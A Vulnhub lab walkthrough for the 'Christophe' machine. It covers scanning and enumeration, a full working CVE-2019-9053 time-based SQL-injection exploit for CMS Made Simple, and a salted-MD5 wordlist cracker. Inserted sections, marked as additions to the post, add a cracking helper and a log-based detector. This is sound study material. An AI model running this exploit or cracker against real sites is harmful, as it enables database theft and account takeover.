Christophe
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:8e:b3:52 1 60 PCS Systemtechnik GmbH
192.168.56.108 08:00:27:ef:e0:1d 1 60 PCS Systemtechnik GmbH
Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.108.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.108 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-29 20:22 EST
Nmap scan report for 192.168.56.108
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1411d18b120b78be044f740d34a5fa07 (RSA)
| 256 476972f9b77633586feb8d1cda9eb5c6 (ECDSA)
|_ 256 790859b0dfec13319ed824541db62744 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2018. All rights reserved.
|_http-title: Home - Viva La Resistance!
MAC Address: 08:00:27:EF:E0:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
- The Nmap scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
- The target's CMS is CMS Made Simple; the version is unknown.
Getting a shell
Browsing to port 80 reveals:
- The CMS version is 2.2.7
- A username appears: Christophe
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ nikto -h http://192.168.56.108
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.108
+ Target Hostname: 192.168.56.108
+ Target Port: 80
+ Start Time: 2023-01-29 20:30:22 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CMSSESSID5406484e3678 created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 7921 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-01-29 20:31:16 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The nikto results show:
- There is an /admin administration interface. An initial try of weak passwords failed, and there is no simple SQL-injection login bypass either.
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/29 20:33:35 Starting gobuster in directory enumeration mode
===============================================================
/modules (Status: 301) [Size: 318] [--> http://192.168.56.108/modules/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.108/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.108/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.108/assets/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.108/install/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.108/lib/]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.108/tmp/]
/server-status (Status: 403) [Size: 302]
Progress: 217763 / 220561 (98.73%)
===============================================================
2023/01/29 20:33:57 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.js,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,js,sh,html,php
[+] Timeout: 10s
===============================================================
2023/01/29 20:35:25 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 20320]
/modules (Status: 301) [Size: 318] [--> http://192.168.56.108/modules/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/doc (Status: 301) [Size: 314] [--> http://192.168.56.108/doc/]
/admin (Status: 301) [Size: 316] [--> http://192.168.56.108/admin/]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.108/assets/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.108/install/]
/lib (Status: 301) [Size: 314] [--> http://192.168.56.108/lib/]
/config.php (Status: 200) [Size: 0]
/tmp (Status: 301) [Size: 314] [--> http://192.168.56.108/tmp/]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1320016 / 1323366 (99.75%)
===============================================================
2023/01/29 20:37:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ dirb http://192.168.56.108
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Jan 29 20:38:44 2023
URL_BASE: http://192.168.56.108/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.108/ ----
==> DIRECTORY: http://192.168.56.108/admin/
==> DIRECTORY: http://192.168.56.108/assets/
==> DIRECTORY: http://192.168.56.108/doc/
+ http://192.168.56.108/index.php (CODE:200|SIZE:20320)
==> DIRECTORY: http://192.168.56.108/install/
==> DIRECTORY: http://192.168.56.108/lib/
==> DIRECTORY: http://192.168.56.108/modules/
+ http://192.168.56.108/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.56.108/tmp/
==> DIRECTORY: http://192.168.56.108/uploads/
---- Entering directory: http://192.168.56.108/admin/ ----
+ http://192.168.56.108/admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.108/admin/lang/
==> DIRECTORY: http://192.168.56.108/admin/plugins/
==> DIRECTORY: http://192.168.56.108/admin/templates/
==> DIRECTORY: http://192.168.56.108/admin/themes/
---- Entering directory: http://192.168.56.108/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/doc/ ----
+ http://192.168.56.108/doc/index.html (CODE:200|SIZE:24)
+ http://192.168.56.108/doc/robots.txt (CODE:200|SIZE:121)
---- Entering directory: http://192.168.56.108/install/ ----
+ http://192.168.56.108/install/index.php (CODE:500|SIZE:0)
---- Entering directory: http://192.168.56.108/lib/ ----
==> DIRECTORY: http://192.168.56.108/lib/assets/
==> DIRECTORY: http://192.168.56.108/lib/classes/
+ http://192.168.56.108/lib/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/jquery/
==> DIRECTORY: http://192.168.56.108/lib/lang/
==> DIRECTORY: http://192.168.56.108/lib/phpmailer/
==> DIRECTORY: http://192.168.56.108/lib/plugins/
==> DIRECTORY: http://192.168.56.108/lib/smarty/
==> DIRECTORY: http://192.168.56.108/lib/tasks/
---- Entering directory: http://192.168.56.108/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/tmp/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/uploads/ ----
==> DIRECTORY: http://192.168.56.108/uploads/images/
+ http://192.168.56.108/uploads/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.108/admin/lang/ ----
+ http://192.168.56.108/admin/lang/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/plugins/ ----
+ http://192.168.56.108/admin/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/templates/ ----
+ http://192.168.56.108/admin/templates/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/admin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/classes/ ----
+ http://192.168.56.108/lib/classes/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/classes/internal/
---- Entering directory: http://192.168.56.108/lib/jquery/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.108/lib/phpmailer/ ----
+ http://192.168.56.108/lib/phpmailer/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/phpmailer/language/
+ http://192.168.56.108/lib/phpmailer/LICENSE (CODE:200|SIZE:26421)
---- Entering directory: http://192.168.56.108/lib/plugins/ ----
+ http://192.168.56.108/lib/plugins/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/smarty/ ----
+ http://192.168.56.108/lib/smarty/index.html (CODE:200|SIZE:24)
==> DIRECTORY: http://192.168.56.108/lib/smarty/plugins/
---- Entering directory: http://192.168.56.108/lib/tasks/ ----
+ http://192.168.56.108/lib/tasks/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/uploads/images/ ----
+ http://192.168.56.108/uploads/images/index.html (CODE:200|SIZE:0)
---- Entering directory: http://192.168.56.108/lib/classes/internal/ ----
+ http://192.168.56.108/lib/classes/internal/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/phpmailer/language/ ----
+ http://192.168.56.108/lib/phpmailer/language/index.html (CODE:200|SIZE:24)
---- Entering directory: http://192.168.56.108/lib/smarty/plugins/ ----
+ http://192.168.56.108/lib/smarty/plugins/index.html (CODE:200|SIZE:24)
-----------------
END_TIME: Sun Jan 29 20:39:08 2023
DOWNLOADED: 83016 - FOUND: 21
The directory-scanning tools did not yield any further useful information.
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ searchsploit CMS Made Simple 2.2.7
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/christophe]
└─$ python exploit.py -u http://192.168.56.108 -w /usr/share/wordlists/rockyou.txt --crack
[+] Salt for password found: 932129a6bd8545bd
[+] Username found: christophe
[+] Email found: [email protected]
[*] Try: 7908b1494f82ed320b288a0e839bfbc5$
[*] Now try to crack password
Traceback (most recent call last):
File "/home/kali/Vulnhub/christophe/exploit.py", line 184, in <module>
crack_password()
File "/home/kali/Vulnhub/christophe/exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.10/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte
An error occurs while reading the rockyou wordlist, so exploit.py needs further modification.
Running the program again produces a different error:
[+] Salt for password found: 932129a6bd8545bd
[+] Username found: christophe
[+] Email found: [email protected]
[+] Password found: 7908b1494f82ed320b288a0e839bfbc5
[*] Try: 123456
Traceback (most recent call last):
File "/home/kali/Vulnhub/christophe/exploit.py", line 191, in <module>
crack_password()
File "/home/kali/Vulnhub/christophe/exploit.py", line 63, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
TypeError: Strings must be encoded before hashing
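The two tracebacks above share one root cause: the wordlist on disk and hashlib both work on bytes, while the script treated both as text. The following added example (not part of the original post or of the Exploit-DB script) reads the wordlist in binary mode and hashes bytes, so neither error can occur; the salt is the one recovered above, while the wordlist bytes and the target hash are constructed for the demo.

```python
import hashlib
from typing import Iterator, Optional

# Salt recovered in the walkthrough above; the scheme the script checks is md5(salt + password).
SALT = "932129a6bd8545bd"

# Constructed wordlist bytes (not rockyou itself): the third entry carries a raw latin-1
# byte 0xf1, the same kind of byte that made the strict utf-8 text reader raise.
WORDLIST_BYTES = b"123456\npassword\nespa\xf1ol\ncorrecthorse\n"


def strict_text_decode_fails(data: bytes) -> bool:
    """Reproduce the first traceback: a strict utf-8 decode of these bytes raises."""
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return True
    return False


def salted_md5(salt: str, candidate: bytes) -> str:
    """md5(salt + candidate) as a hex digest. hashlib accepts only bytes, which is
    what the second traceback ('Strings must be encoded before hashing') complains about."""
    return hashlib.md5(salt.encode("utf-8") + candidate).hexdigest()


def iter_words(data: bytes) -> Iterator[bytes]:
    """Yield candidate words as raw bytes. Staying in bytes means an entry that is not
    valid utf-8 is hashed exactly as stored instead of aborting or skipping the read."""
    for raw in data.splitlines():
        word = raw.rstrip(b"\r")
        if word:
            yield word


def find_match(salt: str, target_hash: str, data: bytes) -> Optional[str]:
    """Return the word whose salted md5 equals target_hash, or None if no entry matches."""
    for word in iter_words(data):
        if salted_md5(salt, word) == target_hash:
            return word.decode("utf-8", errors="replace")
    return None


# Constructed target hash: the digest of a word we know is in the demo list.
TARGET_HASH = salted_md5(SALT, b"correcthorse")

if __name__ == "__main__":
    print("strict utf-8 read fails:", strict_text_decode_fails(WORDLIST_BYTES))
    print("match:", find_match(SALT, TARGET_HASH, WORDLIST_BYTES))
```

With a real file, `open(path, "rb").read()` in place of `WORDLIST_BYTES` gives the same behaviour.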
After modifying the program, the password still was not cracked:
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
options, args = parser.parse_args()

if not options.url:
    print("[+] Specify an url target")
    print("[+] Example usage (no cracking password): exploit.py -u http://target-uri")
    print("[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist")
    print("[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.")
    exit()

# The injection point is the m1_idlist parameter of the News module.
url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
# Character set used to extract values one character at a time.
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1          # seconds the injected sleep() must add before a guess counts as a hit
db_name = ""
output = ""
email = ""
salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist


def crack_password():
    # Offline check of md5(salt + word) against the extracted hash (the author's modified version).
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    while True:
        try:
            line = dict.readline()
        except:
            # Caveat: when readline() raises a decode error, the text layer has already
            # consumed the raw chunk it failed to decode, so the words in that chunk are
            # skipped rather than retried; reading the file in binary mode avoids this.
            continue
        if len(line) == 0:
            break
        line = line.replace("\n", "")
        beautify_print_try(line)
        md = hashlib.md5()
        md.update((str(salt) + line).encode('utf-8'))
        print("Try word: %s" % line)
        if md.hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()


def beautify_print_try(value):
    global output
    print("\033c")
    cprint(output, 'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])


def beautify_print():
    global output
    print("\033c")
    cprint(output, 'green', attrs=['bold'])


def dump_salt():
    # Time-based extraction of the sitemask (salt) from cms_siteprefs, one character per round.
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt


def dump_password():
    # Same technique against cms_users.password for user_id 1.
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password


def dump_username():
    # Same technique against cms_users.username for user_id 1.
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True


def dump_email():
    # Same technique against cms_users.email for user_id 1.
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True


dump_salt()
dump_username()
dump_email()
dump_password()
if options.cracking:
    print(colored("[*] Now try to crack password"))
    crack_password()
beautify_print()
At this point only the username and the (hashed) password have been obtained.
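From the defensive side, the probes this script sends stand out in an Apache access log: every one hits moduleinterface.php with an m1_idlist value that is not a plain list of integers and carries an injected sleep(). The following added example (not from the original post) runs that check over constructed combined-format log lines; the log lines, field names and the marker list are assumptions for the demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not from the page). The third request reuses the
# m1_idlist shape of the script above; the second is ordinary News-module traffic.
SAMPLE_LOG = """\
192.168.56.1 - - [29/Jan/2023:20:45:01 -0500] "GET /index.php?page=news HTTP/1.1" 200 20320 "-" "Mozilla/5.0"
192.168.56.1 - - [29/Jan/2023:20:45:02 -0500] "GET /moduleinterface.php?mact=News,m1_,default,0&m1_idlist=1,2,3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.1 - - [29/Jan/2023:20:45:03 -0500] "GET /moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_siteprefs+where+sitepref_value+like+0x3925+and+sitepref_name+like+0x736974656d61736b)+--+ HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of the time-based blind injection above: an injected sleep(), the CMSMS tables
# it reads, and a trailing SQL comment.
SQLI_MARKERS = re.compile(r"sleep\s*\(|cms_users|cms_siteprefs|\bunion\b|--\s*$", re.IGNORECASE)


def parse_line(line):
    """Split one log line into fields; query parameters are form-decoded ('+' becomes space)."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def is_suspicious(rec):
    """True when a moduleinterface.php request carries a non-numeric m1_idlist with SQLi markers."""
    if rec is None or not rec["path"].endswith("/moduleinterface.php"):
        return False
    for value in rec["params"].get("m1_idlist", []):
        if re.fullmatch(r"[\d,\s]*", value):
            continue  # legitimate idlist values are comma-separated integers
        if SQLI_MARKERS.search(value):
            return True
    return False


def flag_sqli_probes(log_text):
    """Return (ip, timestamp, decoded payload prefix) for every suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if is_suspicious(rec):
            hits.append((rec["ip"], rec["ts"], rec["params"]["m1_idlist"][0][:60]))
    return hits


if __name__ == "__main__":
    for hit in flag_sqli_probes(SAMPLE_LOG):
        print(hit)
```

A real extraction run produces hundreds of such requests from one client in a tight loop, each taking about TIME seconds longer than the rest, so request rate and response time per client are the complementary signals.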
Source: https://www.cnblogs.com/jason-huawen/p/17075077.html